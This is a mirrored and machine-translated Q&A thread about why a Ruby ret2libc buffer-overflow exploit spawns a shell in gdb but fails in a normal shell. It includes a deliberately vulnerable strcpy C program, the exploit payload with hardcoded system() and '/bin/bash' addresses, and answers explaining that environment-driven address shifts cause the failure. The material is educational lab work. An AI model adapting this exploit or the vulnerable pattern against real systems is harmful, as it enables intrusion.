堆栈内存溢出
  简体   繁体   English

Ret2libc漏洞可在gdb中使用,但在普通shell中会出现错误sh:1:g:0:1:找不到

[英]Ret2libc exploit works in gdb, but in normal shell gives error sh: 1: g:0:1: not found

 原文  2013-06-24 01:02:58       c/ buffer-overflow/ exploit

问题描述

I am learning about ret2libc buffer overflow exploits to bypass NX. 我正在学习ret2libc缓冲区溢出漏洞绕过NX。

My vulnerable code (vuln.c): 我的易受攻击的代码(vuln.c): 

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    if (argc != 2)
        printf("NO\n");
    else {
        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);
    }
}

Compiled with this command: # gcc -o vuln vuln.c 使用以下命令进行编译: # gcc -o vuln vuln.c

I then created this simple ret2libc exploit in ruby (exploit.rb): 然后,我在ruby(exploit.rb)中创建了这个简单的ret2libc利用: 

p = "A"*524
p += [0xb7e9ef10].pack('<I') # system()
p += [0xb7e79e46].pack('<I') # nomal ret val
p += [0xbffff75a].pack('<I') # "/bin/bash"
print(p)

If it run it in gdb with (gdb) r $(ruby exploit.rb) it gives me a nice bash shell. 如果它在(gdb) r $(ruby exploit.rb)在gdb中运行,它将为我提供一个不错的bash shell。

I then try to run it in a normal shell with # ./vuln $(ruby exploit.rb) , but instead of giving me a shell it gives me this instead: sh: 1: g:0:1: not found 然后,我尝试使用# ./vuln $(ruby exploit.rb)在普通的shell中运行它,但是# ./vuln $(ruby exploit.rb)给我一个shell, # ./vuln $(ruby exploit.rb)给我一个它: sh: 1: g:0:1: not found

ASLR is disabled and the only protection enabled is NX, I think. 我认为ASLR已禁用,唯一启用的保护是NX。

Any help is appreciated. 任何帮助表示赞赏。

Edit: 编辑:

I am running this on i686 in case that helps. 我在i686上运行此程序以防万一。

2 个解决方案

解决方案1
 1 已采纳  2013-07-09 19:25:05

The reason for shifting is the execution environment. 转移的原因是执行环境。 

user@feynman:~$ ./getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff82
user@feynman:~$ /home/user/getenv PWN
PWN ("/home/user/pwn") is at 0xbfffff70

Here the way of launching getenv is affecting address of the PWN . 在这里启动getenv的方式会影响PWN的地址。

解决方案2
 0  2013-06-26 02:39:36

You achieved code execution but the address of the SHELL env var is off. 您已完成代码执行,但SHELL env var的地址已关闭。 Try [address of shell in gdb] + 4 , or in gdb, x/s 0xbffff75a+4. 尝试[address of shell in gdb] + 4 ,或者在gdb, x/s 0xbffff75a+4.

暂无
暂无

声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.

相关问题 缓冲区溢出(ret2libc)漏洞利用问题 - Having problem in Buffer Overflow(ret2libc) exploit ret2libc 攻击不会产生 shell - ret2libc attack doesn't spawn shell ret2libc 攻击 MOVAPS 段错误 - ret2libc attack MOVAPS segfault ret2libc 攻击中的段错误,但不是硬编码的系统调用 - Segfault in ret2libc attack, but not hardcoded system call 地址 0x0000000000000000 处的 ret2libc 段错误 - ret2libc segfault at address 0x0000000000000000 漏洞利用可在gdb中使用,但不能在命令行上使用 - Exploit works in gdb but not on the command line gdb对ret和自然收益给出不同的结果 - `gdb` gives different results for `ret` and natural return 缓冲区溢出-利用gdb进行调试时可利用漏洞,但 - buffer overflow - exploit works while debuging with gdb, but 返回libc在gdb中工作,但在单独运行时则不行 - return to libc works in gdb but not when running alone 在ret2ret漏洞利用上执行shellcode - execute shellcode on a ret2ret exploit
相关标签
 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM